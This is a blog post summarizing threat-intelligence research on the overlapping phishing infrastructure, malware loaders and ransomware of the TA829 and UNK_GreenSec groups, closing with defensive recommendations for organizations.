|

TA829 and UNK_GreenSec: Unmasking the Overlapping Tactics Behind Modern Malware Campaigns

ByInnoVirtuoso

If you’re reading this, you’re likely concerned about the relentless evolution of cyber threats—and you’re not alone. In a digital landscape where hacking groups morph tactics and share secrets at breakneck speed, keeping up can feel like chasing shadows. But what if two notorious threat actor groups are not just sharing strategies, but also overlapping their digital footprints and infrastructure? Welcome to the tangled web of TA829 and UNK_GreenSec—a case study in how the lines between cybercrime and espionage are blurring in real time.

In this post, I’ll break down the latest findings from leading cybersecurity researchers on these groups’ shared tactics, give you a plain-English explanation of how they pull off their attacks, and—most importantly—help you understand what this means for your own digital defenses.

Let’s dive in.

Who Are TA829 and UNK_GreenSec? A Quick Primer

Before we unpack their latest moves, let’s put some names to faces (or, at least, to threat group monikers):

Meet TA829

TA829 (also tracked as CIGAR, Nebulous Mantis, Storm-0978, Tropical Scorpius, UAC-0180, UAT-5647, UNC2596, and Void Rabisu) is a Russia-aligned hacking group known for its hybrid playbook. They’re equally comfortable launching espionage operations as they are running financially-motivated ransomware attacks. In short: TA829 is unpredictable and highly adaptive.

Key highlights: – Linked to the RomCom RAT malware (Remote Access Trojan). – Known for exploiting zero-day vulnerabilities—previously targeting Mozilla Firefox and Microsoft Windows. – Uses both cybercrime and state-sponsored tactics, making attribution notoriously tricky.

Enter UNK_GreenSec

UNK_GreenSec, a relative newcomer in public threat actor tracking, first drew attention when Proofpoint investigators noticed uncanny similarities with TA829’s operations. Their favorite tool? A malware loader called TransferLoader.

Key highlights: – Associated with campaigns delivering ransomware (notably Morpheus). – Leverages infrastructure and delivery techniques strikingly similar to TA829. – Suspected of serving as either a peer, a service provider, or perhaps even an alter ego of TA829.

Why does this overlap matter? Because when threat groups start mirroring each other, it raises the stakes for defenders—making attacks harder to spot, trace, and block.

How Did Researchers Connect the Dots? Infrastructure and Tactics as Cyber Fingerprints

Cyber threat intelligence isn’t just about catching hackers red-handed. More often, it’s about pattern recognition—spotting the digital fingerprints hackers leave behind.

Unusual Infrastructure Overlap

Proofpoint’s researchers flagged an “unusual amount of similar infrastructure, delivery tactics, landing pages, and email lure themes” between TA829 and UNK_GreenSec. This isn’t just a coincidence—think of it like two burglars using the same getaway car and lockpicks in different neighborhoods.

Shared Building Blocks:

  • REM Proxy services: Both groups rely on compromised MikroTik routers to obfuscate their traffic routes, relay phishing emails, and hide their real locations. (Learn more about REM Proxy)
  • Freemail providers: They use free email accounts (Gmail, ukr.net, etc.) created en masse, likely via an email builder utility.
  • Landing pages: Spoofed Google Drive or Microsoft OneDrive pages, often with elaborate filtering to weed out security sandboxes.

Email Campaigns: The First Domino

Most attacks start with a phishing email—sometimes in the email body, sometimes as a PDF attachment. The goal is simple: Get the unsuspecting user to click a link.

Here’s what happens next: 1. Redirection via Rebrandly: The link redirects through Rebrandly’s URL-shortening service. 2. Filtering: Only “real” victims—not security researchers—are allowed through. 3. Fake cloud pages: The victim lands on a spoofed cloud storage page, primed to deliver the next stage of the attack.

Malware in Action: SlipScreen, TransferLoader, and the Modern Threat Arsenal

Once a victim clicks that malicious link, the attack can fork depending on which group is pulling the strings. Let’s break down the two main paths:

TA829’s Chain: SlipScreen and RomCom RAT

  • SlipScreen: A first-stage loader designed to check if the infected computer is “real” (not a sandbox). It does this by counting recent files in the user’s Windows Registry—if there’s a healthy number (at least 55), it proceeds.
  • Payloads: Next, it drops further malware:
  • MeltingClaw (a downloader)
  • ShadyHammock or DustyHammock (backdoors)
  • SingleCamper/SnipBot (an updated RomCom RAT)

Here’s why that matters: Each stage is like peeling an onion. There’s always another layer, and each one is harder to detect.

Fun fact: Previous versions checked for at least 100 recent documents—an arbitrary but clever way to avoid infecting decoy systems.

UNK_GreenSec’s Path: TransferLoader and the Ransomware Angle

UNK_GreenSec’s campaigns have their own twist:

  • Theme: Often disguised as job opportunities, luring victims into downloading what looks like a resume PDF.
  • TransferLoader: The primary malware loader, designed to stay stealthy and serve up more dangerous payloads.
  • Final payloads: Includes Morpheus ransomware, a rebranded version of HellCat.

Why is this scary? TransferLoader leverages dynamic landing pages and server-side filtering, making detection a moving target. Plus, the use of InterPlanetary File System (IPFS) for hosting payloads decentralizes their infrastructure, making takedown efforts even tougher.

The Secret Sauce: Living-Off-the-Land and Stealth Tactics

Both groups exploit “living-off-the-land” (LOTL) tactics—a hacker term for abusing legitimate software and services to move undetected.

What does LOTL look like in these campaigns?

  • Bulletproof hosting: Using providers who turn a blind eye to abuse, making takedown nearly impossible.
  • PLINK (PuTTY Link): A tool for setting up secure SSH tunnels, used here to hide command-and-control (C2) traffic.
  • IPFS hosting: Decentralized file sharing to host utilities and payloads, frustrating traditional security efforts.
  • Encrypted C2 communications: Once inside, all communications are encrypted, keeping prying eyes out.

Let me explain: LOTL tactics are like burglars using your own house keys and alarm codes against you. They blend in so well with normal activity that traditional security tools can easily miss the threat.

Are TA829 and UNK_GreenSec the Same? Four Theories, One Unsettling Trend

Here’s where things get spicy. The evidence points to a close relationship between the groups, but the exact nature remains unclear. Proofpoint outlines four plausible scenarios:

  1. Same Third-Party Provider: Both groups are clients of a common “cybercrime-as-a-service” provider, buying infrastructure and tools off the shelf.
  2. TA829 as Distributor: TA829 runs its own infrastructure and sometimes lets UNK_GreenSec use it.
  3. UNK_GreenSec as Provider: UNK_GreenSec builds the infrastructure, sometimes using it for their own attacks, sometimes renting it out to TA829.
  4. They’re One and the Same: The groups are aliases for a single entity, and TransferLoader is simply a new addition to their malware suite.

As Proofpoint wisely notes: Attribution in today’s threat landscape is a moving target. Espionage and cybercrime are converging, with traditional boundaries melting away.

Here’s why that matters: For defenders, it means you can’t rely on old assumptions. Whether you’re facing a “cybercriminal” or a “nation-state,” the tools, tactics, and infrastructure might be identical.

Decoding the Attack Flow: From Phish to Full Compromise

Let’s walk through a real-world attack sequence, so you can see where the danger lies—and where defenses can break down.

  1. Phishing email lands in inbox
  2. Sender address looks legitimate (e.g., ximajazehox333@gmail.com).

  3. Subject line promises a job offer, invoice, or other enticing bait.

  4. Victim clicks the embedded link or opens PDF

  5. Link is routed through Rebrandly, filtering out non-targets.

  6. If the victim passes the filter, they’re redirected to a fake OneDrive or Google Drive page.

  7. Malware Loader is dropped

  8. Depending on the campaign, this could be SlipScreen or TransferLoader.

  9. Loader checks system characteristics to confirm it’s a genuine user.

  10. Final payloads deployed

  11. Could be ransomware (Morpheus), a banking trojan, backdoor, or RAT.

  12. Persistence and lateral movement

  13. Attackers use encrypted tunnels (via PLINK) and legitimate tools to move around undetected.

  14. Additional payloads can be fetched from IPFS or other decentralized services.

  15. Data theft, encryption, or espionage

  16. Attack goals vary—sometimes it’s extortion, other times it’s intelligence gathering.

Key takeaway: Each stage is optimized for stealth and flexibility. Attackers dynamically adjust their methods based on what works, and what defenses they encounter.

Why Do These Attacks Work? What Makes Them So Effective?

It’s easy to blame user “carelessness,” but the reality is more nuanced:

  • Sophisticated social engineering: Phishing emails are tailored, timely, and well-crafted.
  • Technical evasion: Using proxies, encrypted traffic, decentralized hosting, and system checks to avoid detection.
  • Modular payloads: Attackers can mix and match malware components to fit the job.

Empathy moment: If you’re a security leader, sysadmin, or just someone who wants to avoid malware, it’s not your fault these attacks are so hard to spot. The adversaries are constantly innovating, and even well-trained users can fall for a convincingly crafted lure.

What Can You Do? Practical Steps for Defenders

Knowledge is power. Here’s how you can tilt the balance in your favor:

1. Harden Your Infrastructure

  • Patch continually: Zero-day exploits are a favorite tactic for these groups. Prioritize patches for software like browsers and routers.
  • Lock down routers: MikroTik routers are a frequent target. Change default credentials, update firmware, and monitor for unauthorized access.
  • Monitor outbound traffic: Unusual traffic patterns, especially via SSH tunnels or to IPFS endpoints, should trigger alerts.

2. Train and Test Your People

  • Phishing simulations: Regular, realistic testing keeps your team sharp.
  • Awareness programs: Educate users about the latest lures—job offers, cloud sharing links, etc.

3. Deploy and Tune Security Tools

  • Network segmentation: Limit the blast radius if an endpoint is compromised.
  • Endpoint detection and response (EDR): Invest in solutions that look for behavioral indicators, not just known signatures.
  • Threat intelligence: Subscribe to feeds from trusted providers like Proofpoint and PRODAFT.

4. Plan for the Worst

  • Incident response: Have a clear, tested plan for dealing with ransomware or data breaches.
  • Backups: Maintain regular, offline backups to recover quickly from file encryption attacks.

The Big Picture: Why Attribution Means Less Than Ever

As the boundaries between cybercrime and espionage dissolve, defenders must focus less on “who” and more on “how”—and “how to stop it.”

This case study is a perfect example. TA829 and UNK_GreenSec may be distinct or two faces of the same adversary. What matters most is recognizing the overlapping infrastructure, tactics, and tradecraft, so you can spot and block their campaigns—no matter who’s behind the keyboard.

FAQ: People Also Ask

What is the RomCom RAT, and why is it dangerous?

The RomCom RAT (Remote Access Trojan) is a type of malware that allows attackers to take full control of an infected system remotely. It’s dangerous because it can steal sensitive data, install additional malware, and evade detection using stealthy techniques.

How do TA829 and UNK_GreenSec deliver their malware?

Both groups primarily use phishing emails with malicious links or attachments. These links often lead to fake cloud storage pages, which then deliver malware loaders like SlipScreen or TransferLoader.

What is TransferLoader?

TransferLoader is a malware loader first documented in 2025. Its main goal is to install further malware (like ransomware) onto a victim’s machine while remaining undetected by traditional security tools.

How do REM Proxy services work in these campaigns?

REM Proxy services are networks of compromised routers (often MikroTik devices) that attackers use to relay their malicious traffic, disguise its true origin, and avoid being blocked or traced.

Can regular antivirus stop these threats?

Traditional antivirus solutions may miss these threats because the attackers use customized, modular malware and encrypted communications. Advanced threat detection, behavioral monitoring, and user education are essential.

What should organizations do to defend against these attacks?

  • Patch systems and devices promptly.
  • Monitor for suspicious outbound traffic.
  • Educate users about phishing tactics.
  • Use advanced security tools (EDR, threat intelligence).
  • Plan for incident response and maintain secure backups.

For even more details on these threat groups, check out The Hacker News coverage and Zscaler’s ThreatLabz analysis.

Final Thoughts: Stay Vigilant as Threats Converge

As TA829 and UNK_GreenSec demonstrate, today’s adversaries are operating in increasingly sophisticated—and interconnected—ways. Whether they’re two sides of the same coin or simply borrowing from the same playbook, the result is the same: Advanced, persistent, and hard-to-detect attacks.

Stay informed, keep your defenses layered, and never underestimate the creativity of cyber adversaries. If you found this article helpful, consider subscribing for more threat intelligence updates and practical security insights.

Until next time—stay safe, stay curious, and keep one step ahead.

If you want deep dives like this in your inbox, subscribe to our newsletter or check out our latest security guides on emerging threats!

Discover more at InnoVirtuoso.com

I would love some feedback on my writing so if you have any, please don’t hesitate to leave a comment around here or in any platforms that is convenient for you.

For more on tech and other topics, explore InnoVirtuoso.com anytime. Subscribe to my newsletter and join our growing community—we’ll create something magical together. I promise, it’ll never be boring! 

Stay updated with the latest news—subscribe to our newsletter today!

Thank you all—wishing you an amazing day ahead!

Read more related Articles at InnoVirtuoso

InnoVirtuoso

Hello there! I'm passionate content writer navigating the digital landscape. With a deep love for words and an insatiable curiosity about technology.

With 10 years of experience in IT field, I write mostly about emerging tech, sharing news, informational articles and covering other topics I find interesting.

Let's craft the future of content together – one word at a time!

Browse InnoVirtuoso for more!